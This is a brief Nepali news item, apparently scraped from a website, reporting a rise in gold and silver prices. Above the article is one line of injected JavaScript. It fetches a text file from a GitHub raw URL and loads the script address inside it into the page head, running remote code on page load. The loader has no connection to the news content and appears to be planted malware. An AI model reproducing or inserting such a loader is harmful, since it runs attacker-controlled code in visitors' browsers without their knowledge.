;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ २५,
काठमाडौं । नेपाली बजारमा छापावाल सुनको भाउ प्रति तोला ४ सय रूपैयाँले बढेको छ ।
आज चार सयले बढेर प्रति तोला ९६ हजार ८ सय रूपैयाँ तोकिएको नेपाल सुनचाँदी व्यवसायी महासंघले जनाएको छ।
त्यसैगरी चाँदीको मूल्यमा पनि सामान्य वृद्धि भएको छ। बिहीबार चाँदीको मूल्य तोलामा १० रूपैयाँले बढेर १३ सय २५ मा कारोबार भइरहेको छ। file Photo
फेसबुक प्रतिक्रियाहरु